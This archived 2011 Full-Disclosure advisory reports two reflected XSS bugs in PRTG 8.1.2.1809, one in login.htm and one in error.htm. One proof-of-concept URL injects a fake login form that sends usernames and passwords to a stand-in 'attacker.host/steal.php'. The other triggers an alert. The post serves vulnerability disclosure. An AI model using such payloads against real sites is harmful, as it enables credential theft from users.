lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <AANLkTim0V+E59u0dLznQqrt03E2-ycJRMz1cYtw6tqVf@mail.gmail.com>
Date: Wed, 26 Jan 2011 08:33:49 -0700
From: Joshua Gimer <jgimer@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: PRTG V8.1.2.1809 XSS Bugs in login.htm and
	error.htm

XSS (Reflected) Bugs in login.htm and error.htm
================================================================
PRTG V8.1.2.1809 (All OS Versions):
http://www.paessler.com/

I have discovered two XSS bugs within PRTG version 8.1.2.1809. These bugs
are in the login.htm and error.htm documents.

These issues were possible because of a lack of input checking of the errormsg
 and errorurl GET parameters within login.htm. Output encoding
routines were also
not consistently used throughout the application.

PoC:

https://localhost/public/login.htm?loginurl=%2Fpublic%2F&errormsg=%3C/div%3E%3C/form%3E%3Ctable%3E%3Cform%20action=%22http://attacker.host/steal.php%22%20method=%22GET%22%3E%3Ctr%3E%3Ctd%3ELogin%20Name:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20id=%22loginusername%22%20name=%22username%22%20type=%22text%22%20value=%22%22%20%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3EPassword:%3C/td%3E%3Ctd%3E%3Cinput%20class=%22text%22%20%20id=%22loginpassword%22%20name=%22password%22%20type=%22password%22%20value=%22%22%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Ctd%3E%3Cinput%20id=%22submitter%22%20class=%22submit%22%20type=%22submit%22%20value=%22Login%22%3E%3C/td%3E%3C/tr%3E%3C/form%3E%3C/table%3E%3Ciframe%20width=0%20height=0%20src=%22&loginurl=%2Fhome

https://localhost/error.htm?errormsg=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E&errorurl=%22%3E%3Cimg%20src=%22kaasdfasdf%22%20onerror=%22javascript:alert%28/test/%29%22/%3E

The vendor was very responsive and has fixed these issues in version
8.2.0.1898/189 released on January 17th 2011.

--
Thanks,
Joshua Gimer

---------------------------

http://www.linkedin.com/in/jgimer
http://twitter.com/jgimer

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ